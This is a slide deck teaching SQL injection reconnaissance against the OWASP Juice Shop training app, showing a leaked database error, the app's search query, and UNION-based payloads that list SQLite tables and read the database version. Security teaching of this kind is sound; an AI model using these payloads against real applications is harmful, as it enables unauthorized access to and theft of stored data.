Injection Attacks: The Complete 2020 Guide

Information Gathering & Vulnerability Analysis

  • Information gathering helps us find potential vulnerabilities
     
  • It helps us know where to start and where to go next

Why Information Gathering?



{
  "error": {
    "message": "SQLITE_ERROR: near \";\": syntax error",
    "stack": "SequelizeDatabaseError: SQLITE_ERROR: near \";\": syntax error\n    at Query.formatError (/juice-shop/node_modules/sequelize/lib/dialects/sqlite/query.js:422:16)\n    at Query._handleQueryResponse (/juice-shop/node_modules/sequelize/lib/dialects/sqlite/query.js:73:18)\n    at afterExecute (/juice-shop/node_modules/sequelize/lib/dialects/sqlite/query.js:250:31)\n    at replacement (/juice-shop/node_modules/sqlite3/lib/trace.js:19:31)\n    at Statement.errBack (/juice-shop/node_modules/sqlite3/lib/sqlite3.js:14:21)",
    "name": "SequelizeDatabaseError",
    "parent": {
      "errno": 1,
      "code": "SQLITE_ERROR",
      "sql": "SELECT * FROM Products WHERE ((name LIKE '%' or 1=1;--%' OR description LIKE '%' or 1=1;--%') AND deletedAt IS NULL) ORDER BY name"
    },
    "original": {
      "errno": 1,
      "code": "SQLITE_ERROR",
      "sql": "SELECT * FROM Products WHERE ((name LIKE '%' or 1=1;--%' OR description LIKE '%' or 1=1;--%') AND deletedAt IS NULL) ORDER BY name"
    },
    "sql": "SELECT * FROM Products WHERE ((name LIKE '%' or 1=1;--%' OR description LIKE '%' or 1=1;--%') AND deletedAt IS NULL) ORDER BY name"
  }
}




SELECT * FROM Products WHERE 
((name LIKE '%' OR description LIKE '%') AND deletedAt IS NULL) 
ORDER BY name;

SQL query being used by the application for the search function



SELECT * FROM Products WHERE ((name LIKE '%')) UNION SELECT [etc...]

What we would like for the query to look like...



SELECT name FROM sqlite_master
WHERE type='table' 
ORDER BY name;

Query to list all tables in a SQLite database



')) UNION SELECT name,name,name,name,name,name,name,name,name FROM sqlite_master WHERE type='table' --

What our payload looks like



SELECT * FROM Products WHERE ((name LIKE '%')) UNION SELECT name,name,name,name,name,name,name,name,name
FROM sqlite_master 
WHERE type='table' --

Which will result in this query



')) UNION SELECT sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(); --

Payload to get the SQLite database version

SQLi Information Gathering & Vulnerability Analysis

By Christophe Limpalair

Made with Slides.com

SQLi Information Gathering & Vulnerability Analysis

  • 499

More from Christophe Limpalair